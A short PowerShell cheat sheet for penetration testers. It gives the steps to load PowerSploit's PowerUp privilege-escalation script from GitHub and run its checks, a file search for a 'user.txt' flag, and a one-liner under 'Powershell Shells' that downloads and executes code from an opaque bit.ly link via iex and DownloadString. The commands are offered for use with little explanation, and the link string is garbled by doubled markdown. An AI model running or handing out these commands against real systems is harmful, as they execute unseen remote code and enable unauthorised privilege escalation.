PowerShell For Pentesters Part 1: Introduction to PowerShell and Cmdlets

PowerSploit Pack

PowerShellMafia/PowerSploit

PowerUp!

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

From Powershell:

Import-Module ./PowerUp.ps1

Invoke-AllChecks

Powershell Shells

Determine outside connectivity and firewall allowance:

iex(New-Object Net.WebClient).DownloadString('[<http://bit.ly/1kEgbuH>](<http://bit.ly/1kEgbuH>)')

Misc Commands and Helper Docs

Search recursively for a file called "user.txt" for example:

Get-ChildItem -ErrorAction SilentlyContinue -Recurse C:\\ -Filter "user.txt"